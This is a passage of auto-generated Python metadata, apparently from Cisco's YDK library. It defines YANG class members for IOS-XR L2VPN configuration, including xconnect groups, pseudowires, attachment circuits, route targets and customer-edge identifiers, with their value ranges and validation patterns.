'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-routed',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds',
False,
[
_MetaInfoClassMember('pseudowire-routed', REFERENCE_LIST, 'PseudowireRouted' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted',
[], [],
''' Pseudowire configuration
''',
'pseudowire_routed',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-routeds',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable attachment circuit interface
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits',
False,
[
_MetaInfoClassMember('attachment-circuit', REFERENCE_LIST, 'AttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit',
[], [],
''' Attachment circuit interface
''',
'attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 38)], [],
''' Name of the point to point xconnect
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('attachment-circuits', REFERENCE_CLASS, 'AttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits',
[], [],
''' List of attachment circuits
''',
'attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-attachment-circuits', REFERENCE_CLASS, 'BackupAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits',
[], [],
''' List of backup attachment circuits
''',
'backup_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interworking', REFERENCE_ENUM_CLASS, 'InterworkingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterworkingEnum',
[], [],
''' Interworking
''',
'interworking',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('monitor-sessions', REFERENCE_CLASS, 'MonitorSessions' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions',
[], [],
''' List of Monitor session segments
''',
'monitor_sessions',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('p2p-description', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' cross connect description Name
''',
'p2p_description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-evpns', REFERENCE_CLASS, 'PseudowireEvpns' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns',
[], [],
''' List of EVPN Services
''',
'pseudowire_evpns',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-routeds', REFERENCE_CLASS, 'PseudowireRouteds' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds',
[], [],
''' List of pseudowire-routed
''',
'pseudowire_routeds',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowires', REFERENCE_CLASS, 'Pseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires',
[], [],
''' List of pseudowires
''',
'pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'p2p-xconnect',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects',
False,
[
_MetaInfoClassMember('p2p-xconnect', REFERENCE_LIST, 'P2PXconnect' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect',
[], [],
''' Point to point xconnect
''',
'p2p_xconnect',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'p2p-xconnects',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router distinguisher type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy',
False,
[
_MetaInfoClassMember('export', ATTRIBUTE, 'str' , None, None,
[], [],
''' Export route policy
''',
'export',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('import', ATTRIBUTE, 'str' , None, None,
[], [],
''' Import route policy
''',
'import_',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-policy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets',
False,
[
_MetaInfoClassMember('mp2mp-route-target', REFERENCE_LIST, 'Mp2MpRouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget',
[], [],
''' Name of the Route Target
''',
'mp2mp_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Attachment Circuit
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-ce-id', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Remote Customer Edge Identifier
''',
'remote_ce_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'remote-ceid-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits',
False,
[
_MetaInfoClassMember('remote-ceid-attachment-circuit', REFERENCE_LIST, 'RemoteCeidAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit',
[], [],
''' AC And Remote Customer Edge Identifier
''',
'remote_ceid_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'remote-ceid-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid',
False,
[
_MetaInfoClassMember('ce-id', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Local Customer Edge Identifier
''',
'ce_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-ceid-attachment-circuits', REFERENCE_CLASS, 'RemoteCeidAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits',
[], [],
''' AC And Remote Customer Edge Identifier
Table
''',
'remote_ceid_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ceid',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids',
False,
[
_MetaInfoClassMember('ceid', REFERENCE_LIST, 'Ceid' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid',
[], [],
''' Local Customer Edge Identifier
''',
'ceid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ceids',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol',
False,
[
_MetaInfoClassMember('ce-range', ATTRIBUTE, 'int' , None, None,
[('11', '100')], [],
''' Local Customer Edge Identifier
''',
'ce_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ceids', REFERENCE_CLASS, 'Ceids' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids',
[], [],
''' Local Customer Edge Identifier Table
''',
'ceids',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable signaling protocol
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable auto-discovery
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-route-policy', REFERENCE_CLASS, 'Mp2MpRoutePolicy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy',
[], [],
''' Route policy
''',
'mp2mp_route_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-route-targets', REFERENCE_CLASS, 'Mp2MpRouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets',
[], [],
''' Route Target
''',
'mp2mp_route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-signaling-protocol', REFERENCE_CLASS, 'Mp2MpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol',
[], [],
''' signaling protocol in this MP2MP
''',
'mp2mp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-distinguisher', REFERENCE_CLASS, 'RouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 26)], [],
''' Name of the multi point to multi point
xconnect
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mp2mp-auto-discovery', REFERENCE_CLASS, 'Mp2MpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery',
[], [],
''' auto-discovery in this MP2MP
''',
'mp2mp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-control-word', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable control word
''',
'mp2mp_control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-interworking', REFERENCE_ENUM_CLASS, 'InterworkingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterworkingEnum',
[], [],
''' Interworking
''',
'mp2mp_interworking',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' shutdown this MP2MP VPWS instance
''',
'mp2mp_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpl2-encapsulation', REFERENCE_ENUM_CLASS, 'L2EncapsulationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2EncapsulationEnum',
[], [],
''' Configure Layer 2 Encapsulation
''',
'mp2mpl2_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpmtu', ATTRIBUTE, 'int' , None, None,
[('64', '65535')], [],
''' Maximum transmission unit for this MP2MP
VPWS instance
''',
'mp2mpmtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpvpn-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' VPN Identifier
''',
'mp2mpvpn_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-xconnect',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects',
False,
[
